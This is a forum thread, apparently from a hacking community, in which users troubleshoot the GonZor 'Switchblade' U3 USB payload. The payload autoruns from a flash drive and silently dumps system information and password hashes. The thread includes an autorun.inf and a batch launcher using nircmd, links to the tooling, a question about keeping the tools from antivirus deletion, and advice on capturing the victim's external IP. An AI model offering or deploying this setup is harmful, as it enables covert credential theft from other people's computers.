~Gozor~ Finished Payload

[Monkeymook]

So...I've been doing a little work here, to see if I can get any different results.  :???: Now, when I use GonZor's Payload, and manually run "go.bat" (because it won't run unless I do; Amish technique), then the script runs, but VERY quickly. I end up with no log.

Now I'm trying to rig up something that could possibly work, since the suggestion of a (dir) list of files in someone else's Switchblade may be out. That would help though.

So here it goes:

I'm trying to mount these files into the CD portion:

start.bat

@echo off

for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist set dir=%%i

cd /e %dir%:

cd /e SYSTEM (How would I change the letter drive (e:) to a wild (any) drive?)

nircmd.exe execmd e:SYSTEMSRCgo.bat (Maybe attaching the Amish technique in a script could work?)

LAUNCHU3.EXE execmd e:LAUNCHU3.exe (Please tell me if this has anything to do with the Payload!)

Don't ask why the letter drives say e:; I'm learning.  :D

Autorun.inf

[Autorun]

open=start.bat

LAUNCHPAD.ZIP

LAUNCHPAD

cleanup.exe

Launchpad Removal.exe

LaunchPad.exe

Loading.gif

Loading.htm

LPHelp-ch.chm

LPHelp-de.chm

LPHelp-en.chm

LPHelp-es.chm

LPHelp-fr.chm

LPHelp-it.chm

LPHelp-jp.chm

SanDiskFormatExtension.dll

SanDiskFormatExtension.dll.sig

SanDiskSecurityExtension.dll

SanDiskSecurityExtension.dll.sig

U3AccessGrant.exe

u3dapi10.dll

U3LauncherSetup.msi

version.dat

SYSTEM/SRC

SRC contains GonZor's Payload; IE: all files from U3CUSTOM.

LAUNCHU3

LAUNCHU3.EXE

There are no files in the removable drive section. Should there be?

Now: further testing. If I place GonZor's Payload on the Removable Partition, then I still have to use the Amish technique, and the progs are susceptible to AV deletion, which happened before, but GonZor's Payload gave me a successful log. What the hell.

[trustme]

First off, GonZor will be away for two days, so I'll do my best to help you.

Before you run the universal customizer, delete all of the files you have on your flash partition (besides system and the like), this will prevent installation errors.

My first recommendation would be to reinstall the Payload using the universal customizer and reflashing your u3 partition.

Follow the instructions here: http://www.users.on.net/~simmo_89/switchblade/tutorial.html

Then open sbconfig and check Dump System Info, make sure u3 launchpad is turned off (The button should read "Turn U3 Launchpad On", make sure the payload status button reads "Turn PL Off", click update Config then quit and select yes when it asks if you want to save your settings.

Try that and let me know if you still have any issues.  It should take only a couple minutes to flash your usb drive, any longer and you may be having problems.

[Monkeymook]

Nope still getting nothing. I've played around with the settings for SB Config, and nothing works. I can't get U3 or the payload to start on insertion of the drive. I tried manually running go.cmd, and all the files ran by quickly, leaving no log. I think it is trying to write the files to the CD section of the drive, and not the logs folder in the writable section.

[Monkeymook]

What versions of the payload, SB Config, and Universal Customizer should I use? Should I install the Launchpad first, and then use the Customizer?

[trustme]

Sbconfig:

http://www.users.on.net/~simmo_89/switchbl...hBlade-V2.0.zip

UC

http://www.users.on.net/~simmo_89/switchbl..._Customizer.zip

Instructions:

http://www.users.on.net/~simmo_89/switchblade/tutorial.html

You're using a u3 drive, so launchpad should already be installed....

[Monkeymook]

Nope. I did exactly what you said, and still getting nothing. Autorun is not working when the drive is inserted in the computer, and when go.bat is executed manually through cmd, all the programs run through quickly, about 2-3 seconds, and still no log is left.

UPDATE!

I installed all the files to the CD Partition, and although that did not work, I copied the whole dir to the removable section, and lo and behold, after manually running go.bat, it worked! A log was created!

Now that I can get a log, how do I go about making it so these cannot be deleted by an AV? WITHOUT USING CSRSS? That does not work.

[polsen]

hi this tool is very good!!!!

I've only one question if I want remove from the usb key this tool there is a method? or a removal tool?

thx

[Kittenmasskiller]

Im going to ask you an stupid question but ive installed your payload v2.0 followed all instruction for downloading and installing ..

I put sbconfig in the flash partition and all of that but i have no cluw where this is dumping the information from my own system is it going to my email or what i dont understand help...thanks

[Kittenmasskiller]

ok Nvm i found out where the log goes but I have another problem when i config. your payload it and run it on my own machine it dosent give me all the stuff i told it to dump into the log file. im useing windows xp pro.. anyone know what the problem may be?

[ReDSpideR]

the config is a bit nacky in the saving sense, do this, i found it saves properly.

1. set up your dump options

2. hit update config

3. hit exit, yes to save.

good luck

[trustme]

You just had to resurrect the thread?

Do you know how many times I've waited for the 11 page monster thread to fall off the page???

:-P

[HarshReality]

The other option is to simply stop coming into this thread :P

[trustme]

But then I'll miss bugs and complaints...

And what would I do with all my free time?

[HarshReality]

Just did a modification for Safety.dat on C and copy the XP activation file... but I cant figure why hacksaw isnt running..

http://forums.hak5.org/index.php/topic,8046.msg83035.html#msg83035

[Hawkens85]

Have a 1GB SanDisk Cruzer Micro that's about two years old, was running fine using MD 1. 0, 1. 1 and 1. 2 payload (except for the fact that I couldn't update the Pwdump. exe in the 1. 2 payload), I tried running Gonzors setup, no go.  I unzipped the folders into C:, replaced the U3CUSTOM ISO image, and ran the Universal Customizer prog.  It formated the drive, got to 55%, opened up the two drives, stopped, and said "Faled to access your U3 smart drive. "  I tried closing out all other progs, re-tried it several times, same error.  Reloaded the U3 software on it and have the MD progs on there, but McAfee and Symantec both catch the PWdump prog and automatically delete it.  Any ideas?

[HarshReality]

Im curious, I noticed in the v2 notes on Gonzor's site they worked on the VB to resolve the "No Disk" error. Exactly what was changed if I might ask? On another type of payload I get it in Vista and the launchpad is 1.4.0.2

[beakmyn]

The edition of "on error resume next" should fix the issue, as well as not omitting drive A,B from the search.

[Benjo]

Hi,

I installed this, and have tested this on 6 different computers, and can't seem to get the External iP.. all it says in the log file is "External IP Dumped" Do I need the ip.shtml, and if so, where do I put it.

Thanks,

Ben

[Jen]

Who digged this up?

[sablefoxx]

Hi,

I installed this, and have tested this on 6 different computers, and can't seem to get the External iP.. all it says in the log file is "External IP Dumped" Do I need the ip.shtml, and if so, where do I put it.

Thanks,

Ben

Yes, put it in the root of the usb drive also check for firewalls, as they will sometimes block this sort of thing.

[marc]

You want to upload ip.shtml somewhere on the web, and then in Gonzor's exe, tell it the URL of where it is.